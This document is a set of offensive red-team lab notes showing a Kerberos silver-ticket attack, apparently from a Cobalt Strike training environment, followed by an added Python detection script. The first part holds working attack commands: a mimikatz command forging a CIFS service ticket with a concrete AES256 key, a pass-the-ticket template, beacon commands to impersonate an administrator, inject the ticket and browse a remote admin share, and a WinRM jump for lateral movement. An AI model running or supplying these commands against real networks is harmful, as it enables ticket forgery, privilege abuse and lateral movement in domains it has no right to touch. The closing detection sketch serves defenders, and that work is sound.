mimikatz # kerberos::golden /user:Administrator /domain:dev.cyberbotic.io /sid:S-1-5-21-3263068140-2042698922-2891547269 /target:srv-2 /service:cifs /aes256:babf31e0d787aac5c9cc0ef38c51bab5a2d2ece608181fb5f1d492ea55f61f05 /ticket:srv2-cifs.kirbi
# OR
kerberos::golden /user:<> /domain:<> /sid:<> /target:<> /service:<> /rc4:<> /ticket:silver.kirbi /ptt
beacon> make_token DEV\Administrator FakePass
[+] Impersonated DEV\bfarmer
beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\srv2-cifs.kirbi
beacon> ls \\srv-2\c$
beacon> rev2self
beacon> run klist
Current LogonId is 0:0x2d3d7
Cached Tickets: (2)
#0> Client: Administrator @ dev.cyberbotic.io
Server: host/srv-2 @ dev.cyberbotic.io
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 5/26/2021 17:04:19 (local)
End Time: 5/24/2031 17:04:19 (local)
Renew Time: 5/24/2031 17:04:19 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
#1> Client: Administrator @ dev.cyberbotic.io
Server: http/srv-2 @ dev.cyberbotic.io
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 5/26/2021 17:06:34 (local)
End Time: 5/24/2031 17:06:34 (local)
Renew Time: 5/24/2031 17:06:34 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
beacon> jump winrm64 srv-2 smb
[+] established link to child beacon: 10.10.17.68
Note: the target machine account's hash can be used as the service hash for the file-sharing service (CIFS).
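
Detection note (an added example, not part of the original notes): the klist output above shows two things a defender can check in cached tickets, a lifetime of roughly ten years and an empty Kdc Called field. The sketch below parses klist-style text and flags both; the 10-hour limit assumes the default domain Kerberos policy, the date format is the US one shown above, and the second sample ticket (hosts fs-1 and dc-1) is constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample: ticket #0 reuses fields from the klist output above,
# ticket #1 (fs-1, dc-1) is a made-up normal ticket for contrast.
SAMPLE = """\
#0> Client: Administrator @ dev.cyberbotic.io
Server: host/srv-2 @ dev.cyberbotic.io
Start Time: 5/26/2021 17:04:19 (local)
End Time: 5/24/2031 17:04:19 (local)
Kdc Called:
#1> Client: bfarmer @ dev.cyberbotic.io
Server: cifs/fs-1 @ dev.cyberbotic.io
Start Time: 5/26/2021 9:00:00 (local)
End Time: 5/26/2021 19:00:00 (local)
Kdc Called: dc-1.dev.cyberbotic.io
"""

FIELD = re.compile(r"^\s*(?:#\d+>\s*)?([A-Za-z ]+?)\s*:\s?(.*)$")
TIME_FMT = "%m/%d/%Y %H:%M:%S"
MAX_LIFE = timedelta(hours=10)  # assumption: default domain ticket lifetime

def parse_klist(text):
    # Split klist text into one dict per ticket, keyed by field name.
    tickets = []
    for line in text.splitlines():
        if re.match(r"\s*#\d+>", line):
            tickets.append({})
        m = FIELD.match(line)
        if m and tickets:
            tickets[-1][m.group(1)] = m.group(2).strip()
    return tickets

def lifetime(ticket):
    # End Time minus Start Time, ignoring the trailing "(local)" marker.
    start, end = (datetime.strptime(ticket[k].split(" (")[0], TIME_FMT)
                  for k in ("Start Time", "End Time"))
    return end - start

def suspicious(ticket, max_life=MAX_LIFE):
    # Heuristics only: either reason warrants a closer look, not a verdict.
    reasons = []
    if lifetime(ticket) > max_life:
        reasons.append("lifetime exceeds policy")
    if not ticket.get("Kdc Called"):
        reasons.append("no KDC recorded")
    return reasons

if __name__ == "__main__":
    for t in parse_klist(SAMPLE):
        print(t["Server"], suspicious(t) or "ok")
```

Set `max_life` to the ticket lifetime actually configured in the domain before relying on the first check.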